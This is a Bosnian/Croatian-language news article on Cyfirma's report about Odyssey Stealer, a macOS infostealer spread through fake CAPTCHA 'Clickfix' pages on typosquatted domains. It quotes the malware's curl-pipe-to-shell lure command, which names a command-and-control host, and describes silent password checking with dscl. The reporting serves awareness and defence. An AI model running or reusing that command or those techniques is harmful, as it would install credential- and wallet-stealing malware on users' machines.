Nova sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS-a pojavila se, koristeći obmanjujuće “Clickfix” taktike za distribuciju zlonamjernih AppleScriptova dizajniranih za prikupljanje osjetljivih korisničkih vjerodajnica i finansijskih podataka. Kampanja iskorištava domene sa tipfelerima koji snažno oponašaju legitimne finansijske platforme i web-stranice Apple App Store-a, stvarajući uvjerljivu fasadu koja korisnike navodi na izvršavanje opasnih naredbi na svojim sistemima. Napad započinje kada korisnici nehotice posjete zlonamjerne domene koje prikazuju lažne upite za CAPTCHA u stilu Cloudflarea. Ove naizgled legitimne stranice za provjeru valjanosti upućuju korisnike macOS-a da kopiraju i lijepe Base64 kodirane naredbe u svoje terminalske aplikacije kako bi dokazali da nisu roboti. Nakon izvršavanja, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka koja cilja vjerodajnice pretraživača, novčanike kriptovaluta i osjetljive lične podatke pohranjene u više aplikacija. Istraživači Cyfirme identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, preimenovanu verziju ranije poznatog Poseidon Stealera, koji je sam potekao kao forka AMOS Stealera. Tim za istraživanje je otkrio više komandno-kontrolnih panela povezanih s ovom aktivnošću, s infrastrukturom uglavnom hostovanom u Rusiji. Zlonamjerni softver pokazuje jasnu preferenciju za ciljanje korisnika u zapadnim zemljama, posebno u Sjedinjenim Američkim Državama i Evropskoj uniji, dok upadljivo izbjegava žrtve u zemljama ZND-a. Odyssey Stealer predstavlja zabrinjavajući evoluciju u zlonamjernom softveru usmjerenom na macOS, kombinujući taktike socijalnog inženjeringa sa sofisticiranim tehničkim mogućnostima. Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja eksploatiše ljudsku psihologiju predstavljajući korisnicima poznato izgledajuće sigurnosne upite koji se čine kao rutinske procedure provjere. Napadači su pažljivo izradili svoje distribucijske web-stranice kako bi replicirali pouzdane platforme, čineći detekciju posebno izazovnom za nesuđene korisnike. Mehanizam infekcije zlonamjernog softvera oslanja se na višefazni proces koji započinje typosquattingom domena i završava sveobuhvatnim kompromitovanjem sistema. Kada korisnici posjete zlonamjerne domene, nailaze na profesionalno dizajnirane stranice koje repliciraju izgled legitimnih sistema za provjeru CAPTCHA. Lažni upit prikazuje upute za korisnike macOS-a da izvrše naredbu koja izgleda ovako: curl -s http://odyssey1.to:3333/d?u=October | sh. Ova naredba preuzima i izvršava AppleScript sa servera za komandu i kontrolu napadača. Skript koristi alfanumeričku obfuskaciju za skrivanje naziva funkcija, iako analiza otkriva njegovu pravu svrhu. Nakon izvršavanja, zlonamjerni softver stvara privremenu strukturu direktorija koristeći naredbu mkdir, specifično uspostavljajući /tmp/lovemrtrump kao svoju operativnu bazu. AppleScript zatim prikazuje uvjerljiv prompt za autentifikaciju dizajniran da uhvati sistemsku lozinku korisnika. Kako bi tiho provjerio ukradene vjerodajnice, koristi macOS naredbu dscl s parametrom authonly, osiguravajući da proces provjere ostane skriven od korisnika. Ova tehnika omogućava zlonamjernom softveru da potvrdi valjanost lozinke bez pokretanja sistemskih upozorenja ili sumnje korisnika, demonstrirajući duboko razumijevanje napadača macOS sigurnosnih mehanizama.
Sigurnosna firma Cyfirma je objavila upozorenje putem svog bloga i drugih online kanala, uključujući mrežu X, o novoj kampanji zlonamjernog softvera koja cilja na korisnike macOS-a. Ova kampanja koristi sofisticirane “Clickfix” tehnike kako bi dostavila zlonamjerne AppleScriptove koji kradu povjerljive korisničke akreditive i finansijske podatke.
Metodologija napada uključuje kreiranje domena sa tipfelerima koji precizno oponašaju legitimne finansijske platforme ili Apple App Store. Na taj način se stvara lažni osjećaj povjerenja kod korisnika. Nakon što korisnik nehotice posjeti takav zlonamjerni domen, prikazuje mu se lažna stranica za verifikaciju, slična onima koje koristi Cloudflare za CAPTCHA provjere. Ova stranica korisniku daje upute da kopira i zalijepi specifičnu naredbu u svoj terminal. Ta naredba, kodirana u Base64 formatu, nakon izvršavanja pokreće niz zlonamjernih radnji.
Ove radnje uključuju krađu akreditiva iz pretraživača, podataka iz novčanika kriptovaluta, te raznih osjetljivih ličnih informacija pohranjenih u drugim aplikacijama na sistemu. Zlonamjerni softver je identificiran kao Odyssey Stealer, što je u suštini rebrendirani Poseidon Stealer, koji je nastao kao fork AMOS Stealera. Infrastruktura za ovu kampanju, uključujući komandno-kontrolne panele, uglavnom je locirana u Rusiji. Zapaženo je da kampanja uglavnom cilja korisnike u zapadnim zemljama, poput SAD-a i zemalja Evropske unije, dok izbjegava korisnike iz zemalja ZND-a.
Odisej Stealer predstavlja značajan napredak u razvoju macOS zlonamjernog softvera jer kombinuje socijalni inženjering sa naprednim tehničkim mogućnostima. Umjesto oslanjanja na uobičajene ranjivosti softvera, napadači vješto iskorištavaju ljudsku psihologiju. Prevaranti korisnicima prezentiraju poznate sigurnosne upite, koji izgledaju kao standardne procedure provjere, čime uspijevaju prevariti i navesti ih na izvršavanje potencijalno štetnih radnji. Distribucijske web-stranice su pažljivo kreirane da izgledaju kao legitimne platforme, što otežava njihovo prepoznavanje od strane korisnika. Detaljnije objašnjenje upozorenja ukazuje na to da je zlonamjerni softver opremljen da sačeka na izvršavanje dok korisnik ne unese svoju lozinku. Nakon toga, koristi se macOS naredba `dscl` sa parametrom `authonly` kako bi se tiho provjerila ispravnost unijete lozinke bez pokretanja bilo kakvih sistemskih upozorenja ili izazivanja sumnje kod korisnika. Ova metoda, koja demonstrira duboko poznavanje sigurnosnih mehanizama macOS-a, omogućava napadačima da potvrde valjanost ukradenih akreditiva na nevidljiv način.
